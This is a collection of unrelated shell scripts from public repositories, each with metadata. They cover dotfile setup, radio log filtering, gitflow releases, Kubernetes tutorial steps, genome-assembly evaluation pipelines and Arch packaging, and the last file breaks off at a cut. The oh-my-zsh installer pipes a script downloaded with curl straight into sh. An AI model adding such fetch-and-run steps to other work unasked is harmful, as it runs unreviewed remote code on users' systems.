1292085de1d643bc357df4f887d636115056eaf6 | Shell | mephraim/dotfiles-etc | /installers/install-oh-my-zsh.sh | UTF-8 | 377 | 3.046875 | 3 | [] | no_license | #!/bin/sh
install_oh_my_zsh() {
if [ ! -d "$HOME/.oh-my-sh/" ]; then
sh -c "$(curl -fsSL https://raw.githubusercontent.com/robbyrussell/oh-my-zsh/master/tools/install.sh)"
fi
if [ ! -d "$HOME/.oh-my-zsh/custom/themes/powerlevel9k/" ]; then
git clone https://github.com/bhilburn/powerlevel9k.git ~/.oh-my-zsh/custom/themes/powerlevel9k
fi
}
install_oh_my_zsh
| true |
002e5cd76d9a4f42dd0c773a6a32af7fad553a08 | Shell | kb1vc/WSPRLog | /scripts/FilterFiles.sh | UTF-8 | 1,604 | 3.34375 | 3 | [
"BSD-3-Clause"
] | permissive | #!/bin/bash -v
# some are prolific two-receiver stations
fname=$1
basename=$2
# split the file into logs
WSPRLogSplitter --igz on ${fname} ${basename}
for bf in ${basename}_*.csv
do
rfn=`basename ${bf} .csv`
echo "processing ${bf}"
WSPRLogBandFilter --flo 0.0 --fhi 100e9 ${bf} ${rfn}_img_tmp.csv
# figure out which calls should be removed.
# make a temporary band split file
WSPRLogLineFilter ${rfn}_img_tmp.csv ${rfn}_img_tmp
# gather the calls that are likely to be multi-reporters
CallRR ${bf} ${rfn}_img_tmp_D.csv ${rfn}_callrr.rpt
grep '^H' rx_${rfn}_callrr.rpt | awk '{ print $2; }' | sort > ${rfn}_exclude_calls.lis
# now remove the possible problem RX stations
grep -v -f ${rfn}_exclude_calls.lis ${rfn}_img_tmp.csv > ${rfn}_img.csv
grep -v -f ${rfn}_exclude_calls.lis ${bf} > ${rfn}_clean.csv
# remove the junk files
rm ${rfn}_img_tmp.csv [rt]x_${rfn}_callrr.rpt ${rfn}_img_tmp_*.csv
# now generate the splits with problematic calls removed
WSPRLogBandFilter --flo 0.0 --fhi 100e9 ${rfn}_clean.csv ${rfn}_img.csv
# generate the R input file
WSPRLog2R ${rfn}_clean.csv ${rfn}_R.csv
WSPRLogLineFilter ${rfn}_img.csv ${rfn}_img
#
for bif in ${rfn}_img_D.csv
do
echo " ${bif}"
hfbn=`basename ${bif} .csv`
# calculate the relative risk for exception reports by solar hour
WSPRLogSolTimeOR ${rfn}_clean.csv ${bif} ${hfbn}_sol_time_or.dat
WSPRLogHisto ${bif} ${hfbn}_FD.hist --field FREQ_DIFF
WSPRLogXY ${bif} ${hfbn}_DIST_FD.xydat --x_field FREQ_DIFF --y_field DIST
done
done
| true |
5311a1120d420650b34b0d840dd3098c40b56348 | Shell | roamlab/HWasP-toy-problem | /activate_env.sh | UTF-8 | 254 | 2.59375 | 3 | [] | no_license | # This file needs to be at the root of project dir
export PROJECTDIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
export PYTHONPATH=${PROJECTDIR}
source ${PROJECTDIR}/venv_mass_spring/bin/activate
echo "Mass-spring toy problem environment ready."
| true |
055eac1c3118f053b2ea692e3f91fa96dda8e105 | Shell | adamiprinciples/gitflow-semver | /git-release-bash | UTF-8 | 1,873 | 4.21875 | 4 | [
"MIT"
] | permissive | #!/bin/bash
if [ "$1" != 'major' -a "$1" != 'minor' -a "$1" != 'patch' -a "$1" != 'init' -a "$1" != 'version' ]; then
>&2 echo "Usage: git release major|minor|patch|init|version"
exit 1
fi
if [ "$1" == 'version' ]; then
echo "0.2.0"
exit 0
fi
if [ `git rev-parse master` != `git rev-parse origin/master 2> /dev/null` ]; then
>&2 echo "Error: master is out of date with origin, please update/push first!"
exit 1
fi
lastVersion=`git describe --abbrev=0 master 2> /dev/null`
if [ $? != 0 ]; then
if [ "$1" == 'init' ]; then
read -p "No tags found in repo, shall we initialize this repo for gitflow? [Y/n] " -n 1 -r
echo
if echo $REPLY | grep -E '^[Nn]$' > /dev/null; then
exit 1
else
git flow init
lastVersion="0.0.0"
fi
else
>&2 echo "Error: no tags found in repo, run again with 'init' to initialize for gitflow"
exit 1
fi
elif [ `git rev-parse develop` != `git rev-parse origin/develop 2> /dev/null` ]; then
>&2 echo "Error: develop is out of date with origin, please update/push first!"
exit 1
fi
versionArray=(${lastVersion//./ })
major=${versionArray[0]}
minor=${versionArray[1]}
patch=${versionArray[2]}
if [ "$1" == 'major' ]; then
newVersion="$((major+1)).0.0"
elif [ "$1" == 'minor' ]; then
newVersion="$major.$((minor+1)).0"
elif [ "$1" == 'patch' ]; then
newVersion="$major.$minor.$((patch+1))"
elif [ "$1" == 'init' ]; then
newVersion="0.1.0"
fi
echo "Last release was version ${lastVersion}."
echo "We're about to create a new $1 release, with version ${newVersion}."
read -p "Continue? [Y/n] " -n 1 -r
echo
if echo $REPLY | grep -E '^[Nn]$' > /dev/null; then
exit 1
else
if [ "$1" == 'patch' ]; then
git flow hotfix start $newVersion
else
git flow release start $newVersion
if [ "$1" == 'init' ]; then
git flow release finish $newVersion
fi
fi
fi
| true |
6292d58bf29949b96f6d06c7c211ea8ed8d9c656 | Shell | Julio0ctavio/DevOps_Dojo_Julio | /Containers/Kubernetes/K8S-training/guestbook/commands.bash | UTF-8 | 1,333 | 2.6875 | 3 | [] | no_license | # Part I
## Create frontend deployment
kubectl create -f part-i/frontend-deployment.yaml
## Get Pod Name & Port-Forwarding
kubectl port-forward $(kubectl get pods -l app=guestbook,tier=frontend -o jsonpath="{.items[0].metadata.name}") 3000:3000 &
curl 127.0.0.1:3000
## Acces via browser to 127.0.0.1:3000
## Create backend deployment
kubectl create -f part-i/redis-master-deployment.yaml
kubectl create -f part-i/redis-slave-deployment.yaml
# Part II
## Create backend services
kubectl create -f part-ii/redis-master-service.yaml
kubectl create -f part-ii/redis-slave-service.yaml
## Create frontend services
kubectl create -f part-ii/frontend-service.yaml
## Get NODE_PORT and access frontend
curl $(minikube ip):$(kubectl get svc frontend -o jsonpath="{.spec.ports[0].nodePort}")
## Acces via browser to:
echo "$(minikube ip):$(kubectl get svc frontend -o jsonpath="{.spec.ports[0].nodePort}")"
# Part III
## Remove old frontend service
kubectl delete svc frontend
## Create frontend service
kubectl create -f part-iii/frontend-service.yaml
kubectl create -f part-iii/ingress.yaml
## Edit hosts
## Windows Users: https://blog.kowalczyk.info/article/10c/local-dns-modifications-on-windows-etchosts-equivalent.html
echo "$(minikube ip) guestbook-site.com" | sudo tee -a /etc/hosts
## Acces via browser to guestbook-site.com | true |
fa275b506144e90dc52465e288bec109ebb62e25 | Shell | MASILab/thorax_non_rigid_toolbox | /run_scripts/local_scripts/20200202_run_registration_atlas2folder.sh | UTF-8 | 1,864 | 3.3125 | 3 | [] | no_license | #!/bin/bash
##################################################
# 2/2/2020 - Kaiwen
# Build pipeline for thorax non-rigid registration.
##################################################
#bash_config_file=$(readlink -f $1)
#in_folder=$(readlink -f $2)
#reg_folder=$(readlink -f $3)
SRC_ROOT=/home/local/VANDERBILT/xuk9/03-Projects/03-Thorax-FL/src/ThoraxNonRigid
bash_config_file=${SRC_ROOT}/bash_config/20200202_non_rigid_deeds_image2image_label.sh
echo "Non-rigid pipeline, from atlas to images"
echo "Loading bash config from ${bash_config_file}"
source ${bash_config_file}
target_image_folder=${OUT_ROOT}/preprocess_1
atlas_image=${OUT_ROOT}/atlas/atlas_iso.nii.gz
#atlas_image=${OUT_ROOT}/reference.nii.gz
#atlas_label=${OUT_ROOT}/atlas/labels_iso.nii.gz
echo
echo "Target image ${target_image_folder}"
echo "Atlas image ${atlas_image}"
echo "Atlas label ${atlas_label}"
echo
omat_folder=${OUT_ROOT}/omat
#reg_folder=${OUT_ROOT}/reg_reference2image
#reg_folder=${OUT_ROOT}/reg_reference2image_5
reg_folder=${OUT_ROOT}/reg_image2atlas_1
mkdir -p ${omat_folder}
mkdir -p ${reg_folder}
for file_path in "$target_image_folder"/*
do
start=`date +%s`
file_base_name="$(basename -- $file_path)"
out_file_path=${reg_folder}/${file_base_name}
fixed_img=${atlas_image}
moving_img=${file_path}
out_img=${out_file_path}
omat_txt=${omat_folder}/${file_base_name}
reg_tool_root=${REG_TOOL_ROOT}
reg_method=deformable_deedsBCV_paral
reg_args="\"-l_1_-G_16_-L_16_-Q_5\""
label=${atlas_label}
set -o xtrace
${PYTHON_ENV} ${SRC_ROOT}/tools/reg_thorax.py --fixed ${moving_img} --moving ${fixed_img} --out ${out_img} --omat ${omat_txt} --reg_tool_root ${reg_tool_root} --reg_method ${reg_method} --reg_args ${reg_args} --label ${label}
set +o xtrace
end=`date +%s`
runtime=$((end-start))
echo "Complete! Total ${runtime} (s)"
done
| true |
c5b9dc2c8d68075a0f752cc19881005c55118616 | Shell | Yettimania/dotfiles | /.config/sxiv/exec/key-handler | UTF-8 | 690 | 3.921875 | 4 | [] | no_license | #!/usr/bin/env sh
# ^X-^R: prompt for new image name (needs `dmenu`) and `mv`
# ^X-^C: copy the image path to X clipboard (needs `xclip`)
# Example zenity prompt:
# name="$(zenity --entry --display=:0.0 --text "rename $file to")" 2> /dev/null
while read -r file
do
case "$1" in
"C-r")
name="$(dmenu -p "rename $file to: ")" 2> /dev/null
if ! [ -z "$name" ]; then
mv "$file" "$name"
fi
;;
"C-c")
printf "%s" "$file" | xclip -selection clipboard ;;
*)
printf "Sorry, I don't understand"
exit 1
;;
esac
done
| true |
9491b38953cbf759b7d87f508552f2c7cc0105ea | Shell | TommoCrabb/Telly-Wangler | /timestamp.bash | UTF-8 | 139 | 3.078125 | 3 | [] | no_license | #!/usr/bin/env bash
timestamp=$( date +%Y-%m%d-%H%M%S )
if [[ -n "${1}" ]] ; then
echo "${1}_${timestamp}"
else
echo "${timestamp}"
fi
| true |
e738ee9f80d9fa1b01e7e0866099224ff4f2a8ba | Shell | oslab-ewha/memwork | /Simulator/SCM/simulation.sh | UTF-8 | 613 | 2.71875 | 3 | [] | no_license |
export PATH=$PATH:/home/jskim/work/src/github.com/jskim072/Simulator/SCM
export PATH=$PATH:/home/jskim/work/src/github.com/jskim072/Simulator/SCM/trace
filename=`basename $1 .log`
#filename2=${filename}.log
#FIU_parser -o trace/$filename2 -f $1 >> /dev/null 2>&1 &
trace/FIU_parser -o test.txt -f $1 >> /dev/null 2>&1 &
sleep 5
./SCM &
sleep 5
gnuplot -persist << PLOT
set terminal x11
set xlabel "Virtual time"
set ylabel "Logical block address"
plot "other.txt" lt rgb "green" title "OTHERS","seq.txt" lt rgb "red" title "SEQ","loop.txt" lt rgb "blue" title "LOOP"
while(1) {
replot
pause 1
}
PLOT
| true |
96b9f6927cd6faefd7272cfdd95213d213988a4a | Shell | hysds/mozart | /scripts/clean_failed_jobs.sh | UTF-8 | 310 | 2.75 | 3 | [
"LicenseRef-scancode-proprietary-license",
"Apache-2.0"
] | permissive | #!/bin/bash
BASE_PATH=$(dirname "${BASH_SOURCE}")
BASE_PATH=$(cd "${BASE_PATH}"; pwd)
PACKAGE_DIR=$(cd "${BASE_PATH}/.."; pwd)
CONF_FILE_SETTINGS="${PACKAGE_DIR}/settings.cfg"
ES_URL=`grep '^ES_URL' ${CONF_FILE_SETTINGS} | cut -d'"' -f 2`
curl -XDELETE "${ES_URL}/job_status/job/_query?q=status:job-failed"
| true |
65ea799bdf871de5e57991b028a4913cad20aaa6 | Shell | JohnUrban/sciara-project-tools | /slurmgear/evalwrapper/run-evalwrapper.sh | UTF-8 | 9,075 | 2.875 | 3 | [] | no_license | #!/bin/bash
## Input Assemblies FOFN
ASMFOFN=input.fofn
CLEANALL=true
## GETTING ABS PATH OF ASMFOFN
ASMFOFN=`readlink -f $ASMFOFN`
RENAME=true
## MIN CONTIG SIZE -- defaults to analyzing all (minlen=0).
MINLEN=0
##TODO:
## ADD OPTION: make all sequences uppercase
################### SHORT READ ###########################
# specify paths to lap read sample (LR1,LR2) and all reads (R1,R2)-- give dummy answers if will not be using (that will serve as place-holders)
LR1=/users/jurban/data/scratch/lap/sample-1.5m/downsampled.1.fastq
LR2=/users/jurban/data/scratch/lap/sample-1.5m/downsampled.2.fastq
R1=~/data/scratch/male-ilmn/data/ilmnraw/R1.fastq
R2=~/data/scratch/male-ilmn/data/ilmnraw/R2.fastq
## OPTIONS for what programs to use.
## FILL IN ==>"EvalThese"<== BELOW WITH ONE OF THESE
ALL=eval.cfg
ALLDIRTY=eval.noclean.cfg
OnlyAle=eval.aleonly.cfg
OnlyBusco=eval.buscoOnly.cfg
OnlyLap=eval.laponly.cfg
OnlyReapr=eval.reapronly.cfg
OnlyReaprNoClean=eval.reapronly.noclean.cfg
OnlyReaprNoCleanAggressive=eval.reapronly.noclean.aggressive.cfg
OnlyPilon=pilon.eval.cfg
AleModule=alemodule.eval.cfg ## builds bt2, maps reads, runs ale
## FILL IN WITH CORRECT VARIABLE
EvalThese=$ALL
## May need to adjust the following
SHORTSCRIPTS=/gpfs_home/jurban/software/sciaratools/sciara-project-tools/slurmgear/shortreadeval/scripts/
SHORTAUTO=${SHORTSCRIPTS}/auto-shortreadeval.sh
SHORTEVAL=${SHORTSCRIPTS}/eval.ARGS.sh
SHORTCONFIG=${SHORTSCRIPTS}/configs/${EvalThese}
############### BIONANO MALIGNER SECTION #################
BIONANOCLEAN=false
if $CLEANALL; then BIONANOCLEAN=true; fi
REC_ENZ=BssSI
REC_SEQ=CACGAG
BIONANOBASE=/users/jurban/software/sciaratools/sciara-project-tools/slurmgear/opticalmap/malignerautomation
BIONANOSCRIPTS=${BIONANOBASE}/scripts/
BIONANOCONFIGS=${BIONANOBASE}/configs/
BIONANOFOFNS=${BIONANOBASE}/fofns/
BIONANOCONFIG=${BIONANOCONFIGS}/maligner-config-sciara.cfg
MAPSFOFN=${BIONANOFOFNS}/bionanomaps.examp2.fofn
BIONANORUN=${BIONANOSCRIPTS}/auto-malign.sh
############### LONG READ SECTION #################
## LONG READ LOCATIONS
ONT=~/data/scratch/minion2016/fast5fastqs/allReadsFromAllONTlibsCombined.fastq
PACBIO=~/data/scratch/pac_bio_data/filt/all_subreads.fastq
## LONG2PE READ LOCATIONS
ONT1=/gpfs/data/sgerbi/jurban/scratch/minion2016/fast5fastqs/molreads/long2pe/ontmol-1.fastq
ONT2=/gpfs/data/sgerbi/jurban/scratch/minion2016/fast5fastqs/molreads/long2pe/ontmol-2.fastq
PACBIO1=/gpfs/data/sgerbi/jurban/scratch/pac_bio_data/filt/long2pe/pacbio-1.fastq
PACBIO2=/gpfs/data/sgerbi/jurban/scratch/pac_bio_data/filt/long2pe/pacbio-2.fastq
## RUN INFO LOCATIONS
LRBASE=/users/jurban/software/sciaratools/sciara-project-tools/slurmgear/longreadeval
LRSCRIPTS=${LRBASE}/scripts/
AUTOLR=${LRSCRIPTS}/auto-lrpipe.sh
LRCONFIGS=${LRBASE}/configs/
LR_DEFAULT_CFG=longread-config-sciara.cfg
LR_ALE_MODULE_CFG=ale-module-longread-config-sciara.cfg
LRCONFIG=${LRCONFIGS}/${LR_DEFAULT_CFG}
## OTHER OPTIONS
LRCLEAN=false
if $CLEANALL; then LRCLEAN=true; fi
############### TRANSCRIPT SECTION #################
TRANJOBPRE=transcript
TBLASTX=true
TRANSNJOBS=100
TRANSCLEAN=false
if $CLEANALL; then TRANSCLEAN=true; fi
TRANSBASE=/users/jurban/software/sciaratools/sciara-project-tools/slurmgear/transcripteval
TRANSSCRIPTS=${TRANSBASE}/scripts/
TRANSCONFIGS=${TRANSBASE}/configs/
TRANSFOFNS=${TRANSBASE}/fofns/
TRANSCONFIG=${TRANSCONFIGS}/trans-config-sciara.cfg ## does both blastn and tblastx
OTHERSPP_TRANSCONFIG=${TRANSCONFIGS}/other-spp-trans-config-sciara.cfg
TRANSFOFN=${TRANSFOFNS}/
TRANSRUN=${TRANSSCRIPTS}/auto-trans.sh
TRANS1=~/data/illumina/generalTranscriptome/trinity/trinity_out_dir/Trinity.fasta
TRANS2=/gpfs/data/sgerbi/jurban/flies/dmel/dmel-all-transcript-r6.14.fasta
TRANS3=/gpfs/data/sgerbi/jurban/flies/anopheles_gambiae/anopheles-gambiae-pesttranscriptsagamp46.fa
TRANJOBPRE1=${TRANJOBPRE}_sciara_
TRANJOBPRE2=${TRANJOBPRE}_dmel_
TRANJOBPRE3=${TRANJOBPRE}_mosquito_
############### PEPTIDE SECTION #################
## Evaluate with peptides
PEPJOBPRE=peptide
PEPNJOBS=100
PEPCLEAN=false
if $CLEANALL; then PEPCLEAN=true; fi
PEPBASE=/users/jurban/software/sciaratools/sciara-project-tools/slurmgear/peptideval
PEPSCRIPTS=${PEPBASE}/scripts/
PEPCONFIGS=${PEPBASE}/configs/
PEPFOFNS=${PEPBASE}/fofns/
PEPCONFIG=${PEPCONFIGS}/peptide-config-sciara.cfg ## does both blastn and tblastx
PEPFOFN=${PEPFOFNS}/
PEPRUN=${PEPSCRIPTS}/auto-pep.sh
PEP2=/gpfs/data/sgerbi/jurban/flies/dmel/dmel-all-translation-r6.14.fasta
PEP3=/gpfs/data/sgerbi/jurban/flies/anopheles_gambiae/anopheles-gambiae-pestpeptidesagamp46.fa
PEPJOBPRE2=${PEPJOBPRE}_dmel_
PEPJOBPRE3=${PEPJOBPRE}_mosquito_
############### KNOWN SEQUENCES SECTION #################
## Also evaluate Known Seqs
## USE TRANS variables (e.g. TRANSSCRIPTS etc) for everything other than these 4 things
KNOWNJOBPRE=knownseqs_
KNOWNTBLASTX=false
KNOWNNJOBS=1
KNOWNCLEAN=false
if $CLEANALL; then KNOWNCLEAN=true; fi
KNOWNCONFIG=${TRANSCONFIGS}/known-config-sciara.cfg
KNOWNSEQS=/gpfs/data/sgerbi/jurban/sciaraknownseqs/allCoprophilaNTSeqOnNCBI.fa
############### RNASEQ SECTION #################
#$RNARUN $RNASCRIPTS $RNACONFIG $RNACLEAN $ASMFOFN $RNAFOFN
RNACLEAN=false
if $CLEANALL; then RNACLEAN=true; fi
RNABASE=/users/jurban/software/sciaratools/sciara-project-tools/slurmgear/rnaseqeval
RNASCRIPTS=${RNABASE}/scripts/
RNACONFIGS=${RNABASE}/configs/
RNAFOFNS=${RNABASE}/fofns/
RNACONFIG=${RNACONFIGS}/rnaseq-config-sciara.cfg
RNAFOFN=${RNAFOFNS}/reads.fofn
RNARUN=${RNASCRIPTS}/auto-rnaseqeval.sh
RNAFOFN=`readlink -f $RNAFOFN`
############### BUSCO V3 SECTION #################
BUSCOV3CLEAN=true
BUSCOV3BASE=/users/jurban/software/sciaratools/sciara-project-tools/slurmgear/buscov3
BUSCOV3SCRIPTS=${BUSCOV3BASE}/scripts/
BUSCOV3CONFIGS=${BUSCOV3BASE}/configs/
BUSCOV3FOFNS=${BUSCOV3BASE}/fofns/
BUSCOV3CONFIG=${BUSCOV3CONFIGS}/buscov3-config-sciara.cfg
BUSCOV3RUN=${BUSCOV3SCRIPTS}/auto-buscov3.sh
##############################################
##############################################
##############################################
################ EXECUTE #####################
NEWDIR=eval_asms
if $RENAME || [ $MINLEN -gt 0 ]; then mkdir -p ${NEWDIR} ; fi
## IF OPTED; rename and/or set min contig length
if $RENAME; then echo renaming....;
if [ $MINLEN -gt 0 ]; then echo ...also setting min contig length to $MINLEN ; fi
while read fasta; do
b=`basename $fasta`
fasta_name_changer.py -f $fasta -r contig -n --key key-${b}.txt | extractFastxEntries.py --fa --stdin --minlen $MINLEN > ${NEWDIR}/${b}
done < $ASMFOFN
elif [ $MINLEN -gt 0 ] && [ $RENAME != "true" ]; then echo ...setting min contig length to $MINLEN ... ;
while read fasta; do
b=`basename $fasta`
extractFastxEntries.py --fa -f $fasta --minlen $MINLEN > ${NEWDIR}/${b}
done < $ASMFOFN
fi
## CREATE AND USE UPDATED FOFN
if $RENAME || [ $MINLEN -gt 0 ]; then
for f in ${NEWDIR}/*; do
readlink -f $f;
done > renamed.fofn
ASMFOFN=`readlink -f renamed.fofn`
fi
#for f in ${NEWDIR}/*; do
# readlink -f $f;
#done > renamed.fofn
#ASMFOFN=`readlink -f renamed.fofn`
## BEGIN LAUNCHING JOBS
echo shortread
mkdir -p shortread
cd shortread
##bash $SHORTAUTO $ASMFOFN $LR1 $LR2 $R1 $R2 $EvalThese $SHORTSCRIPTS
bash $SHORTAUTO $ASMFOFN $LR1 $LR2 $R1 $R2 $SHORTCONFIG $SHORTSCRIPTS
cd ../
echo bionano
mkdir -p bionano
cd bionano
$BIONANORUN $BIONANOCLEAN $BIONANOCONFIG $ASMFOFN $MAPSFOFN $REC_ENZ $REC_SEQ $BIONANOSCRIPTS
cd ../
echo longread
mkdir -p longread
cd longread
bash $AUTOLR $LRCLEAN $LRCONFIG $ASMFOFN $LRSCRIPTS $ONT $PACBIO $ONT1 $ONT2 $PACBIO1 $PACBIO2
cd ../
echo blast_analyses
mkdir -p blast_analyses
cd blast_analyses
echo transcriptome
mkdir -p transcriptome
cd transcriptome
$TRANSRUN $TRANSSCRIPTS $TRANSCONFIG $TRANSCLEAN $ASMFOFN $TRANS1 $TRANSNJOBS $TBLASTX $TRANJOBPRE1
cd ../
echo dmel
mkdir -p dmel
cd dmel
$TRANSRUN $TRANSSCRIPTS $OTHERSPP_TRANSCONFIG $TRANSCLEAN $ASMFOFN $TRANS2 $TRANSNJOBS $TBLASTX $TRANJOBPRE2
cd ../
echo anopheles
mkdir -p anopheles
cd anopheles
$TRANSRUN $TRANSSCRIPTS $OTHERSPP_TRANSCONFIG $TRANSCLEAN $ASMFOFN $TRANS3 $TRANSNJOBS $TBLASTX $TRANJOBPRE3
cd ../
echo dmel_peptides
mkdir -p dmel_peptides
cd dmel_peptides
$PEPRUN $PEPSCRIPTS $PEPCONFIG $PEPCLEAN $ASMFOFN $PEP2 $PEPNJOBS $PEPJOBPRE2
cd ../
echo anopheles_peptides
mkdir -p anopheles_peptides
cd anopheles_peptides
$PEPRUN $PEPSCRIPTS $PEPCONFIG $PEPCLEAN $ASMFOFN $PEP3 $PEPNJOBS $PEPJOBPRE3
cd ../
echo knownseqs
mkdir -p knownseqs
cd knownseqs
$TRANSRUN $TRANSSCRIPTS $KNOWNCONFIG $KNOWNCLEAN $ASMFOFN $KNOWNSEQS $KNOWNNJOBS $KNOWNTBLASTX $KNOWNJOBPRE
cd ../
#leave blast_analyses
cd ../
echo rnaseq
mkdir -p rnaseq
cd rnaseq
$RNARUN $RNASCRIPTS $RNACONFIG $RNACLEAN $ASMFOFN $RNAFOFN
cd ../
echo buscov3
mkdir -p buscov3
cd buscov3
$BUSCOV3RUN $BUSCOV3SCRIPTS $BUSCOV3CONFIG $BUSCOV3CLEAN $ASMFOFN
cd ../
################ EXECUTE #####################
##############################################
##############################################
##############################################
| true |
134d034f0b348beb33b82ae683225ee6c7bc1468 | Shell | isabella232/aomi | /tests/integration/exec_context.bats | UTF-8 | 352 | 2.515625 | 3 | [
"MIT"
] | permissive | #!/usr/bin/env bats
# -*- mode: Shell-script;bash -*-
load helper
@test "can run aomi normally" {
aomi_run help
}
@test "can run aomi as a dev py" {
cd "$CIDIR" || exit 1
run python aomi.py help
[ "$status" -eq 0 ]
}
@test "can run aomi as a dev dir" {
cd "$CIDIR" || exit 1
run python ./aomi help
[ "$status" -eq 0 ]
}
| true |
a9cc49a1c3d01034639660f3d2381175a9638ae6 | Shell | sed-inf-u-szeged/RMeasure | /ScopeControlService/scopeControlService.sh | UTF-8 | 1,243 | 3.4375 | 3 | [
"BSD-3-Clause"
] | permissive | #!/bin/sh
### BEGIN INIT INFO
# Provides: reparaService
### END INIT INFO
DAEMON=/home/repara/ScopeControlService/scopeControlService
DAEMONARGS=" -c /home/repara/ScopeControlService/scopeControlService.cfg"
. /lib/lsb/init-functions
start_reparaService_daemon() {
start-stop-daemon --start --quiet --exec $DAEMON --$DAEMONARGS
}
stop_reparaService_daemon() {
start-stop-daemon --stop --quiet --signal TERM --oknodo --exec $DAEMON
}
case "$1" in
start)
log_daemon_msg "Starting distributed compiler daemon" "reparaService"
start_reparaService_daemon
log_end_msg $?
;;
stop)
log_daemon_msg "Stopping distributed compiler daemon" "reparaService"
stop_reparaService_daemon
log_end_msg $?
;;
restart|force-reload)
log_daemon_msg "Restarting distributed compiler daemon" "reparaService"
stop_reparaService_daemon
sleep 1
start_reparaService_daemon
log_end_msg $?
;;
status)
status_of_proc "$DAEMON" "reparaService" && exit 0 || exit $?
;;
*)
N=/etc/init.d/reparaService
echo "Usage: $N {start|stop|restart|force-reload|status}" >&2
exit 1
;;
esac
exit 0
| true |
756241d15634e0572e586e90e34090e9c763bd8f | Shell | ponty/pyscreenshot | /tests/vagrant/ubudep.sh | UTF-8 | 507 | 2.546875 | 3 | [
"BSD-2-Clause"
] | permissive | #!/bin/sh
export DEBIAN_FRONTEND=noninteractive
APT="apt-get -o Dpkg::Options::=--force-confold -o Dpkg::Options::=--force-confdef -y --allow-downgrades --allow-remove-essential --allow-change-held-packages"
$APT update
$APT dist-upgrade
update-locale LANG=en_US.UTF-8 LANGUAGE=en.UTF-8
# echo 'export export LC_ALL=C' >> /home/vagrant/.profile
# tools
$APT install -y mc htop python3-pip
sudo python3 -m pip install tox -U
#sudo apt-get install -y x11-utils xvfb
sudo python3 -m pip install pillow -U | true |
0d683d9a8f2a4af113f6144fd3a04510159c97e9 | Shell | filipsPL/autowx | /kalibruj.sh | UTF-8 | 420 | 3.015625 | 3 | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | #!/bin/bash
channel=115
recentShift=`cat var/dongleshift.txt`
re='^-?[0-9]+([.][0-9]+)?$'
if ! [[ $recentShift =~ $re ]] ; then
#echo "error: Not a number" >&2;
recentShift=1.5
fi
#kal -s GSM900 -e 61
#kal -c 116 -g 49.6 -e $recentShift 2> /dev/null | tail -1 | cut -d " " -f 4 | tee var/dongleshift.txt
kal -c $channel -g 49.6 -e $recentShift 2> /dev/null | tail -1 | cut -d " " -f 4 | tee var/dongleshift.txt
| true |
3756b2e62ec130de1407e60c18664e6466ab7b69 | Shell | harisokanovic/archlinux-packages | /cantarell-fonts/trunk/PKGBUILD | UTF-8 | 641 | 2.578125 | 3 | [] | no_license | # $Id$
# Maintainer: Jan Alexander Steffens (heftig) <jan.steffens@gmail.com>
pkgname=cantarell-fonts
pkgver=0.0.16
pkgrel=2
pkgdesc="Cantarell font family"
arch=('any')
url="https://git.gnome.org/browse/cantarell-fonts"
license=('GPL2')
depends=('fontconfig')
install=cantarell-fonts.install
source=(https://download.gnome.org/sources/$pkgname/${pkgver::3}/$pkgname-${pkgver}.tar.xz)
sha256sums=('15bf87555321556750bc68ace360f3df420359a8ab257e15c44fb69710152f1c')
build() {
cd $pkgname-$pkgver
./configure --prefix=/usr --with-configdir=/etc/fonts/conf.avail
make
}
package() {
cd $pkgname-$pkgver
make DESTDIR="${pkgdir}" install
}
# vim:set ts=2 sw=2 et:
| true |
39eecc04b25666113c000717d655f126382ffc9d | Shell | stangls/dotfiles-1 | /lib/common.lib.sh | UTF-8 | 1,540 | 4.25 | 4 | [] | no_license | #!/bin/bash
#
# Shell function library
#
# Ideas / TODO:
# - Error reporting functions: http://linuxcommand.org/wss0150.php
# - Use bash's "set -u" to check for unset variables
function invoke() {
$VERBOSE && echo $@
if $REALLY ; then
"$@"
else
true
fi
}
function fexists() {
type -t $1 >/dev/null
}
function checkpipestatus {
for i in $@; do
if [[ ( $i > 0 ) ]]; then
return $i
fi
done
return 0
}
function parts_ending_on() {
ls $1 | awk 'match($0, /^(.*)'$2'$/, m) { print m[1]; }'
}
function relpath() {
python -c "import os.path; print os.path.relpath('$1', '${2:-$PWD}')"
}
function print_shellscript_header() {
echo "#!/bin/bash"
echo "# This is a shell include file, no need to run it."
echo ""
}
function configure() {
CONFIGFILE="$1" # Config file is argument #1
[ -n "$CONFIGFILE" ] || return 1
# Configuration script on STDIN
# 1. Create a configuration file if it doesn't exist
[ -e "$CONFIGFILE" ] || (
print_shellscript_header
cat
) > "$CONFIGFILE"
# 2. Emit code to load the configuration file
#echo "source \"$CONFIGFILE\""
# 3. Emit the remaining configuration on STDIN, if any
# We need to re-eval the configuration, so any missing variables
# (e.g. in case of an old config file) get set to useful defaults
# This has no effect if a configuration file was created in step 1
# but in exactly this case it is not neccessary.
#cat
}
| true |
20bd16ffe233d01b9a099d625eef0e76679fccac | Shell | msys2/MINGW-packages | /mingw-w64-python-apipkg/PKGBUILD | UTF-8 | 1,626 | 2.609375 | 3 | [
"BSD-3-Clause"
] | permissive | # Maintainer: Andrew Sun <adsun701@gmail.com>
_realname=apipkg
pkgbase=mingw-w64-python-${_realname}
pkgname=("${MINGW_PACKAGE_PREFIX}-python-${_realname}")
provides=("${MINGW_PACKAGE_PREFIX}-python3-${_realname}")
conflicts=("${MINGW_PACKAGE_PREFIX}-python3-${_realname}")
replaces=("${MINGW_PACKAGE_PREFIX}-python3-${_realname}")
pkgver=3.0.1
pkgrel=3
pkgdesc="Namespace control and lazy-import mechanism (mingw-w64)"
arch=('any')
mingw_arch=('mingw32' 'mingw64' 'ucrt64' 'clang64' 'clang32' 'clangarm64')
url="https://github.com/pytest-dev/apipkg"
license=('spdx:MIT')
depends=("${MINGW_PACKAGE_PREFIX}-python")
makedepends=("${MINGW_PACKAGE_PREFIX}-python-build"
"${MINGW_PACKAGE_PREFIX}-python-installer"
"${MINGW_PACKAGE_PREFIX}-python-hatchling"
"${MINGW_PACKAGE_PREFIX}-python-hatch-vcs")
options=('staticlibs' 'strip' '!debug')
source=("https://pypi.org/packages/source/${_realname::1}/${_realname}/${_realname}-${pkgver}.tar.gz")
sha256sums=('f8c021adafc9132ac2fba9fd3c5768365d0a8c10aa375fb15e329f1fce8a5f01')
build() {
cp -r "${_realname}-${pkgver}" "python-build-${MSYSTEM}" && cd "python-build-${MSYSTEM}"
${MINGW_PREFIX}/bin/python -m build --wheel --skip-dependency-check --no-isolation
}
check() {
cd "${srcdir}/python-build-${MSYSTEM}"
